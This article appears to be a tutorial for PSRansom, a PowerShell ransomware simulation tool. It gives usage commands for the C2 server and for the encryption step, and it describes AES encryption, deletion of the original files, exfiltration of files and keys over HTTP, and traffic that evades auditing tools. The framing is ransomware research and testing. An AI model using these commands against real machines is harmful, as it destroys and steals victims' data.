How to use PSRansom for ransomware security analysis

PSRansom is a PowerShell ransomware simulation tool with C2 server functionality that helps researchers simulate the process of universal ransomware data encryption for any operating system platform (as long as PowerShell is installed). With the help of the C2 server function, we can even extract files from the target device (client) via HTTP and receive the information on the server-side.

Communication data between the client and server is encrypted and encoded, so it cannot be detected by traffic-based auditing tools.

Tool requirements

PowerShell 4.0 or later

Tool download

You can clone the project source locally using the following command:

git clone

Once the download is complete, we will get two scripts: PSRansom and C2Server. The first will simulate a ransomware infection, while the second will be responsible for recovering files and their recovery keys.

Tool usage

The tool is very simple to use, we only need to indicate the directory to be encrypted, the IP or hostname of the C2 server, and the port on which to receive the connection.

In addition to that, if we need to send encrypted files, we need to add the -x parameter option at the end of the command. When decrypting, you only need to indicate the directory and recovery key.

Examples of tool usage

First, our test scenario is defined as follows:

1. The ransomware will run on Windows machines

2. The folder we want to encrypt is located in C:Backup

3. The C2 server will run on Kali Linux

4. All traffic will view the details through the proxy

Next, let’s take a look at what the tool offers:

The use of the command and control server is also very simple, we only need to indicate the port of listening for the connection and the port of receiving the connection. Here, we are using port 80:

pwsh C2Server.ps1 + 80

Next, we will run encryption and infiltration using the following command:

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

A random key of 24 alphanumeric characters (lowercase, uppercase, and numeric) is generated, the data is encrypted with AES256, and the recovery key is sent to the C2 server.

When it is done, the original files will be deleted, leaving only the encrypted files:

The server side receives something similar to the one shown in the following figure:

Now we will receive the target device’s information, recovery key, list of encrypted files, etc. on the server side:


License Agreement

The development and distribution of this project are under the GPL-3.0 open source license.

Project address